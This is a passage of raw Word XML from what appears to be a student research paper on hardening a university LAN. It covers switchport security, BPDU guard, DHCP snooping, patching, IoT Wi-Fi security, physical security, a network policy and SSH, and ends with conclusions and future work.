        <w:t>Switchport security can be configured for each ‘Access’ port within a switch to control physical access to individual ports to prevent rogue devices being connected to the network by malicious actors. This is accomplished by configuring each of the ports to either dynamically learn [n] amount of MAC addresses that can connect to the port or manually configure [n] amount of MAC addresses that are allowed to connect to that port. If condition [n] is violated, the ports can be configured for three different violation actions;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025689B1" w14:textId="77777777" w:rsidR="00CF3C74" w:rsidRDefault="00CF3C74" w:rsidP="008A440A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24176E7F" w14:textId="17128B5F" w:rsidR="008A440A" w:rsidRDefault="008A440A" w:rsidP="008A440A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008A440A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Protect;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This violation configuration will permit traffic from the known dynamically and/or manual static MAC addresses whilst denying traffic from the unknown MAC addresses. No syslog messages are logged when this setting is configured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D798B89" w14:textId="77777777" w:rsidR="005512AB" w:rsidRDefault="005512AB" w:rsidP="008A440A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31F6B7E8" w14:textId="28A0EFD4" w:rsidR="008A440A" w:rsidRDefault="008A440A" w:rsidP="008A440A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002C0C2A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Restrict;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This violation is identical to the ‘Protect’ configuration setting with the caveat that all violations are logged using ‘Traps’ syslog messages for an administrator to be aware there are rogue devices within the network whilst permitted traffic is unaffected within the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411D572E" w14:textId="77777777" w:rsidR="008A440A" w:rsidRDefault="008A440A" w:rsidP="008A440A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60FA1AD8" w14:textId="221504B2" w:rsidR="008A440A" w:rsidRDefault="008A440A" w:rsidP="008A440A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008A440A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Shutdown;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This violation configuration is the default setting for ‘Switch-Port Security’ and shuts down the violated port immediately putting it into a ‘Err-disable’ state denying all traffic within the network. The administrator must manually override ‘Err-disable’ before traffic can be permitted to flow through the port there after.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B61E022" w14:textId="77777777" w:rsidR="008A440A" w:rsidRDefault="008A440A" w:rsidP="008A440A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75E4A8F5" w14:textId="7F98F0CA" w:rsidR="008A440A" w:rsidRDefault="008A440A" w:rsidP="008A440A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Bridge Port Data Unit (BPDU) guard was also configured on an ‘Access’ port to prevent a rogue ‘Switching’ device from being connected by malicious actors to prevent switching loops within the LAN that could cause a DoS attack on the network infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7620DFA4" w14:textId="77777777" w:rsidR="008A440A" w:rsidRDefault="008A440A" w:rsidP="008A440A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6032ACB3" w14:textId="3E923C57" w:rsidR="008A440A" w:rsidRDefault="008A440A" w:rsidP="008A440A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DHCP Snooping likewise to BPDU guard was configured on </w:t>
      </w:r>
      <w:r w:rsidR="002907EF">
        <w:t>all ‘</w:t>
      </w:r>
      <w:r>
        <w:t>Access ports</w:t>
      </w:r>
      <w:r w:rsidR="002E5BC5">
        <w:t>’ within</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> each layer-2 switch to prevent a malicious actor introducing a rogue DHCP device into the network that would provide duplicate addresses to end devices also causing a DoS attack within the network.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72939720" w14:textId="77777777" w:rsidR="008A440A" w:rsidRDefault="008A440A" w:rsidP="008A440A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38CE3CDC" w14:textId="77777777" w:rsidR="008A440A" w:rsidRDefault="008A440A" w:rsidP="008A440A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Within the UWTSD LAN, all ‘Access’ switch ports were configured for a maximum of one MAC address that will be allowed to connect to that port, with the violation conditions set to ‘Restrict’ so that permitted traffic will not be effected whilst the violation is being investigated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662E091B" w14:textId="77777777" w:rsidR="008A440A" w:rsidRDefault="008A440A" w:rsidP="008A440A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C75DA68" w14:textId="3800205E" w:rsidR="008A440A" w:rsidRDefault="008A440A" w:rsidP="008A440A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>All unused ports will also be shut down to prevent rogue devices being connected to the access ports of a switch, following industry standard security best practices. BPDU guard will likewise be configured on all access ports for the reasons previously stated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E67F20" w14:textId="77777777" w:rsidR="00230B5A" w:rsidRPr="00230B5A" w:rsidRDefault="00230B5A" w:rsidP="008A440A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="421455DE" w14:textId="79BA0478" w:rsidR="006A105A" w:rsidRDefault="006A105A" w:rsidP="00022E47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Server and End Device OS’s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704A624E" w14:textId="160D197C" w:rsidR="008A71BC" w:rsidRDefault="002E5BC5" w:rsidP="008A71BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>All end devices and servers that are utilised within the UWTSD LAN will utilise the latest OS versions; Windows Server 2019 – Datacentre Edition and Windows 10 desktop OS that will all be configured for regular security updates and patches to known vulnerabilities, this implementation will further prevent exploits such as ‘Eternal Blue’ being leveraged against the servers and end devices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71387661" w14:textId="77777777" w:rsidR="002E5BC5" w:rsidRPr="008A71BC" w:rsidRDefault="002E5BC5" w:rsidP="008A71BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="406E90FA" w14:textId="0561AA3F" w:rsidR="00022E47" w:rsidRDefault="00834724" w:rsidP="00022E47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure </w:t>
      </w:r>
      <w:r w:rsidR="00022E47">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IoT Device</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A128E03" w14:textId="6B055C1E" w:rsidR="008A71BC" w:rsidRDefault="0031078D" w:rsidP="008A71BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure Cisco enterprise grade IoT devices were utilised within the UWTSD network that utilise WPA-2 Enterprise for authentication and data encryption to prevent a MitM attack </w:t>
      </w:r>
      <w:r w:rsidR="00F67491">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">by malicious actors </w:t>
      </w:r>
      <w:r w:rsidR="00F7673D">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">injecting </w:t>
      </w:r>
      <w:r w:rsidR="00AB1C7E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>packets into</w:t>
      </w:r>
      <w:r w:rsidR="00F7673D">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> the IoT wireless devices to remotely exploit them causing damage to property and/or harm to people</w:t>
      </w:r>
      <w:r w:rsidR="00AB1C7E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48363083" w14:textId="77777777" w:rsidR="00084C79" w:rsidRPr="008A71BC" w:rsidRDefault="00084C79" w:rsidP="008A71BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="399E78B1" w14:textId="46458655" w:rsidR="007B1DC6" w:rsidRDefault="007B1DC6" w:rsidP="00022E47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Physical Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743F5713" w14:textId="77777777" w:rsidR="002907EF" w:rsidRPr="002907EF" w:rsidRDefault="002907EF" w:rsidP="002907EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FCCCD0C" w14:textId="3CFC58D5" w:rsidR="002907EF" w:rsidRDefault="002907EF" w:rsidP="002907EF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Physical security is often overlooked when designing a network, but statistically the most common network attacks are </w:t>
      </w:r>
      <w:r>
        <w:t>conducted internally by a malicious actor accessing the physical datacentre infrastructure or by leveraging an attack from an end device that hasn’t been correctly secured i.e. USB ports disabled etc as previously discussed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E8B0A1" w14:textId="77777777" w:rsidR="002907EF" w:rsidRDefault="002907EF" w:rsidP="002907EF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23421EC2" w14:textId="7F1F8DE5" w:rsidR="007021FC" w:rsidRDefault="002907EF" w:rsidP="002907EF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>At the UWTSD building, a temperature-controlled room will be utilised for all the internetworking datacentre equipment to be stored to service the UWTSD LAN. The datacentre will only be accessible by authorised personnel using secure RF-ID badges, and all entries to and from the datacentre equipment will be logged within the syslog server. Also, the Switches and Access Points (AP) located within each of the rooms and hallways will be locked within a secure cabinet, USB ports will also be disabled as a policy for all end devices utilising the network along with strong password policy enforcement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7893800D" w14:textId="4DA46849" w:rsidR="002D1BC2" w:rsidRDefault="002D1BC2" w:rsidP="002907EF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37419236" w14:textId="321B702A" w:rsidR="002D1BC2" w:rsidRDefault="002D1BC2" w:rsidP="002907EF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Secure passwords will also be </w:t>
      </w:r>
      <w:r w:rsidR="009868BF">
        <w:t>implemented on each of the internetworking devices to prevent unauthorised personnel accessing the devices physically with a console cable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A933588" w14:textId="77777777" w:rsidR="002907EF" w:rsidRPr="002907EF" w:rsidRDefault="002907EF" w:rsidP="002907EF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51CEE921" w14:textId="70FB94F6" w:rsidR="007B1DC6" w:rsidRDefault="007B1DC6" w:rsidP="00022E47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Network Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8E914E" w14:textId="77777777" w:rsidR="007021FC" w:rsidRPr="007021FC" w:rsidRDefault="007021FC" w:rsidP="007021FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="013239E0" w14:textId="660DA10E" w:rsidR="007021FC" w:rsidRPr="007021FC" w:rsidRDefault="007021FC" w:rsidP="007021FC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007021FC">
        <w:t>A network policy for end users within a network is often over looked by network professionals. It’s a key component that outlines a framework of rules that must be adhered to whilst using a company’s network. By implementing a network policy and having users read, understand and sign it. Not only educates the end users about their personal responsibility towards data security whilst connected to the network, but it also provides a legally binding contract between the employer and employee, so any violations of the network policy can result in an internal disciplinary procedure or criminal prosecution depending on the severity of the violation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E87C5D" w14:textId="77777777" w:rsidR="007021FC" w:rsidRPr="007021FC" w:rsidRDefault="007021FC" w:rsidP="007021FC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50DA02F8" w14:textId="41378B86" w:rsidR="00084C79" w:rsidRDefault="007021FC" w:rsidP="007021FC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007021FC">
        <w:t xml:space="preserve">Within the final UWTSD LAN a network policy will be created for staff, students and external partners accessing the network to sign to educate and legally protect the university from GDPR prosecution if data was lost or stolen by a malicious internal user who could then be prosecuted for his/her actions. A copy of the UWTSD network policy can be found in </w:t>
      </w:r>
      <w:r w:rsidRPr="00A03BF2">
        <w:t>Appendi</w:t>
      </w:r>
      <w:r w:rsidR="00A03BF2" w:rsidRPr="00A03BF2">
        <w:t>x-</w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00A03BF2" w:rsidRPr="00A03BF2">
        <w:t xml:space="preserve"> of this research paper</w:t>
      </w:r>
      <w:r w:rsidRPr="00A03BF2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B9C05D" w14:textId="77777777" w:rsidR="0031078D" w:rsidRDefault="0031078D" w:rsidP="007021FC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57AF51C2" w14:textId="22DC881A" w:rsidR="00084C79" w:rsidRPr="00084C79" w:rsidRDefault="00084C79" w:rsidP="00084C79">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00084C79">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure Shell </w:t>
      </w:r>
      <w:r w:rsidR="00DC4069">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">version 2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00084C79">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(SSH</w:t>
      </w:r>
      <w:r w:rsidR="00DC4069">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-2</w:t>
      </w:r>
      <w:r w:rsidRPr="00084C79">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>) Remote Administration Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE835FE" w14:textId="77777777" w:rsidR="00AB1C7E" w:rsidRPr="003A3C4F" w:rsidRDefault="00AB1C7E" w:rsidP="007021FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="567210CE" w14:textId="5FF46588" w:rsidR="007021FC" w:rsidRDefault="00DC4069" w:rsidP="007021FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB1C7E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SSH-2 1024bit encryption that utilises</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB1C7E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB1C7E">
        <w:t>Rivest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB1C7E">
        <w:t>–Shamir–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB1C7E">
        <w:t>Adleman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB1C7E">
        <w:t xml:space="preserve"> (RSA) </w:t>
      </w:r>
      <w:r w:rsidR="00AB1C7E" w:rsidRPr="00AB1C7E">
        <w:t>asymmetric encryption algorithm Public Key Exchange (PKE)</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB1C7E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB1C7E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>was configured within the internetworking devices i.e. Routers,</w:t>
      </w:r>
      <w:r w:rsidR="00AB1C7E" w:rsidRPr="00AB1C7E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB1C7E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Switches,</w:t>
      </w:r>
      <w:r w:rsidR="00AB1C7E" w:rsidRPr="00AB1C7E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB1C7E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>hardware firewall and servers for secure remote</w:t>
      </w:r>
      <w:r w:rsidR="00AB1C7E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> access to the devices by the administrator to update configurations and/or troubleshoot the network.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB1C7E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE7FD08" w14:textId="77777777" w:rsidR="003A3C4F" w:rsidRPr="003A3C4F" w:rsidRDefault="003A3C4F" w:rsidP="007021FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67245193" w14:textId="64154E59" w:rsidR="007B1DC6" w:rsidRDefault="007B1DC6" w:rsidP="00022E47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Summary of Section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206B92C3" w14:textId="77777777" w:rsidR="003A3C4F" w:rsidRPr="003A3C4F" w:rsidRDefault="003A3C4F" w:rsidP="003A3C4F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="450A9D1B" w14:textId="67CE9AC9" w:rsidR="005420B8" w:rsidRDefault="00AB1C7E" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>All of the security configurations and implementations that was discussed within this section are industry standard best practices to secure an enterprise LAN from both internal and external attacks along with proactive mitigation techniques to prevent all known attacks along with the attacks that were researched and discussed within this paper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F5275B" w14:textId="77777777" w:rsidR="00403E69" w:rsidRPr="00423A79" w:rsidRDefault="00403E69" w:rsidP="00423A79">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A1F0D5A" w14:textId="70014549" w:rsidR="00403E69" w:rsidRDefault="00403E69" w:rsidP="002A443D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Conclusions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDDB59B" w14:textId="77777777" w:rsidR="00CC313A" w:rsidRDefault="007B1930" w:rsidP="007B1930">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Cybersecurity is a very worrying and ever-growing threat within modern society as people become more reliant on </w:t>
      </w:r>
      <w:r w:rsidR="00CC313A">
        <w:t xml:space="preserve">IoT </w:t>
      </w:r>
      <w:r>
        <w:t>technology to</w:t>
      </w:r>
      <w:r w:rsidR="00891AE2">
        <w:t xml:space="preserve"> assist </w:t>
      </w:r>
      <w:r w:rsidR="00CC313A">
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> carry</w:t>
      </w:r>
      <w:r w:rsidR="00891AE2">
        <w:t>ing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> out </w:t>
      </w:r>
      <w:r w:rsidR="00891AE2">
        <w:t xml:space="preserve">everyday </w:t>
      </w:r>
      <w:r>
        <w:t>tasks</w:t>
      </w:r>
      <w:r w:rsidR="00CC313A">
        <w:t xml:space="preserve"> and chores that they </w:t>
      </w:r>
      <w:r w:rsidR="00B62A76">
        <w:t>have</w:t>
      </w:r>
      <w:r w:rsidR="00891AE2">
        <w:t xml:space="preserve"> become</w:t>
      </w:r>
      <w:r w:rsidR="00CC313A">
        <w:t xml:space="preserve"> severely</w:t>
      </w:r>
      <w:r w:rsidR="00891AE2">
        <w:t xml:space="preserve"> integrated into people’s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lives, this research paper has highlighted not only the current state of cyber security and the </w:t>
      </w:r>
      <w:r w:rsidR="00891AE2">
        <w:t xml:space="preserve">ease in which devices can be exploited from malware to the human factor of social engineering manipulation attacks as well as the active </w:t>
      </w:r>
      <w:r>
        <w:t>cyberwar attack</w:t>
      </w:r>
      <w:r w:rsidR="00891AE2">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00891AE2">
        <w:t>between</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> countries</w:t>
      </w:r>
      <w:r w:rsidR="00891AE2">
        <w:t xml:space="preserve"> in the ‘Information Age’ we live in today.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35811F82" w14:textId="77777777" w:rsidR="00CC313A" w:rsidRDefault="00CC313A" w:rsidP="007B1930">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4663C976" w14:textId="63EAE2AD" w:rsidR="001D56F6" w:rsidRDefault="00CC313A" w:rsidP="007B1930">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">With the ongoing cybersecurity attacks happening daily and the advent of pure 5G ‘Smart Cities’, IoT and cybersecurity in general must be prioritised within all institutions and countries around the globe to prevent future cyberwars and data theft that costs billions every year that will drastically rise if the major cybersecurity issues that are present within the modern Internet are not addressed immediately along with the </w:t>
      </w:r>
      <w:r w:rsidR="001D56F6">
        <w:t>ever-growing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> infringement on personal privacy that </w:t>
      </w:r>
      <w:r w:rsidR="001D56F6">
        <w:t>cybersecurity is stripping us all of bit by bit over the years.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A387A7" w14:textId="77777777" w:rsidR="001D56F6" w:rsidRDefault="001D56F6" w:rsidP="007B1930">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B99C42F" w14:textId="494C48D2" w:rsidR="001D56F6" w:rsidRPr="007B1930" w:rsidRDefault="001D56F6" w:rsidP="007B1930">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The majority of cyberattacks are preventable using the masses of hardware/software technology available within todays market along with the very knowledgeable cyber security professionals that develop IoT devices and design networks and the security within them. These preventable attacks are only happening because of companies who develop IoT, internetworking and end devices do not want to spend money in securing these devices to enhance their profit margins because of the absence of cybersecurity laws that these companies do not have to adhere to along with companies and governments who don’t want to spend additional money for secure and reliable devices</w:t>
      </w:r>
      <w:r w:rsidR="00364948">
        <w:t xml:space="preserve"> and /or knowledgeable staff</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> because of the extra cost of these devices, that is a ‘false economy’ approach to network security because the money that they save</w:t>
      </w:r>
      <w:r w:rsidR="00364948">
        <w:t xml:space="preserve"> on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> buying non reputable devices </w:t>
      </w:r>
      <w:r w:rsidR="00364948">
        <w:t>and not hiring network experts, they lose a lot more money from cyberattacks especially with the new GDPR being enforced within Europe along with their reputation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116F3CED" w14:textId="45CD8D94" w:rsidR="00403E69" w:rsidRDefault="00403E69" w:rsidP="002A443D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Future Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BD3A28" w14:textId="0AF058B1" w:rsidR="007B1930" w:rsidRDefault="00364948" w:rsidP="007B1930">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Future works within cybersecurity would be to set up a 5G IoT smart computer laboratory and test the network security of the new 5G standard and the IoT devices that are networked within the 5G WLAN, to identify any security flaws that were predicted from the research within the </w:t>
      </w:r>
      <w:r w:rsidRPr="00364948">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Future Cybersecurity Trends </w:t>
      </w:r>
      <w:r>
        <w:t>section of this paper.</w:t>
      </w:r>
    </w:p>
